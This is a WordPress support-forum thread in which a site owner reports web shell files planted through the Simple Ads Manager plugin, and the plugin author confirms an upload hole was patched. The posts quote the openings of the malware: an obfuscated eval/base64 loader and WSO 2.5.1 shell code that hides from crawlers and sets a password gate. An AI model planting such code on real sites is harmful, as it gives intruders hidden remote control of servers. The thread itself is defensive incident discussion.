wp-content/uploads/sam_conf.php

  • Hello,

    the Wordfence plugin was complaining about a file wp-content/uploads/sam_conf.php with 3511 bytes – I checked it just now and it is really looking strange. Also because it is not present on other websites where I have SAM running. It is dated from March 10th. Checking the webserver logs I find POST and GET requests on that file from an IP based in Hongkong (not the typical user on our website). Also someone was looking for that file earlier in the SAM plugin directory (the reason why I write here) – where no such file is.

    The file starts with:

    <?php ${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\x73";${"\x47\x4cOBAL\x53"}["\x63\x74xv\x74\x6f\x6f\x6bn\x6dju"]="\x76";${"\x47\x4cO\x42A\x4cS"}["p\x69\x6fykc\x65\x61"]="def\x61ul\x74\x5fu\x73\x65_\x61j\x61\x78";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x77i\x72\x6d\x78l\x71tv\x79p"]="defa

    It looks like my system has been hijacked or something like this?

    Well, as a first action I moved the file away from the webspace.

    Any ideas?

    Cheers,
    Martin

    https://www.ads-software.com/plugins/simple-ads-manager/

Viewing 7 replies - 1 through 7 (of 7 total)
  • Thread Starter msebald

    (@msebald)

    Ok, just found two other suspicious files:

    wp-content/plugins/simple-ads-manager/sam-config-sample.php (March 6th)
    wp-content/uploads/wp-config-sample.php (March 7th)

    As both files are not on other WP installations I run I removed those files.

    It seems like it started with sam-config-sample.php on March 6th.

    I checked all other files on this webspace and it seems that no other files have been changed. At least the file date is older than March 6th…

    The files content looks suspicious. wp-config-sample.php is also encoded like the first file in my first post (BTW: Where can I decode such files to see the real content?). sam-config-sample.php is not (which makes it look REALLY suspicious, even for a non programmer, as it checks for system stuff, PHP functions and a lot more). Here are the beginnings of both files:

    wp-config-sample.php:

    <?php
$auth_pass = "xxx";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx4CQnxYY4cezEebFTvyRp4tx0gQW2Xli6u5i4qb/7PTN6WWlfME57rut+fk/OacJKo9FIGo1Go9HIG5bX3cksvi6Xuqf7J+/3Tz7bL8/O3nXP4av79MX+0Zn9pVJh39YY/CnNIzd8OnKnccTazAlD57psvQiCke9aVWad+vNwhj/enh49C2L85TldJ+yPvSs3xM/fnOnA/Yq/TpxJz4fEyjZh9oblWeiOuhMn7o/L9qbNasybzPxg4Jbtv+2qXnUF8uxNDxNXoBn/jF1n4IZlgtps1OrsQf0BOwpidhDMpwNb0IB/3K9ezL9u1m7W1na9qdeN3Lhsu2EYhF0/GNnVo/M3b6BIkgepXcqP7GrdyJk4X7vuV7c/j71g2o29iSsgIJc+u7438eKySps4I6/f/XMexG7UDedThOG5A3foTaEz

    (I replaced the auth_pass by “xxx”.)

    sam-config-sample.php:

    <?php

$auth_pass="xxx";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5.1');

if(get_magic_quotes_gpc()) {
        function WSOstripslashes($array) {
                return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
        }
        $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
        die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

    (I replaced the auth_pass by “xxx” here, too.)

    Plugin Author minimus

    (@minimus)

    These files are not the part of the original set of files of the SAM plugin!

    Thread Starter msebald

    (@msebald)

    Yes I know. Interesting that they show up in this directory and under these names.

    I checked everything with Wordfence, did not find anything more than these three files. Also no other files altered.

    I just want to add my experience here — one of my client’s sites was hijacked last week, and most of the infected files seem to be in the SAM plugin folder. The WordPress install and all plugins were up to date, I believe.

    I’m seeing malicious “sam_conf.php” and “sam-config-sample.php” in the SAM plugin folder. The intruder left several malicious files on the root of the site with names like “cache.php” and “402.php”, and a few such files in /wp-admin and /wp-includes.

    I don’t know if the hack was enabled by a vulnerability in SAM, but it might be a good idea to investigate!

    Can you post an update here since you have pushed out a new version? It would be good to kn ow what you found — now that it has been corrected.

    Thanks.

    Plugin Author minimus

    (@minimus)

    I removed unused code from the file sam-ajax-admin.php. Attackers could use this piece of code to upload files to the server.

    Thread Starter msebald

    (@msebald)

    So SAM was the reason for my problems. Good to know and thank you for digging into this and releasing a patched version.

    Did you get any further information what happened when a website was affected by hackers?

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘wp-content/uploads/sam_conf.php’ is closed to new replies.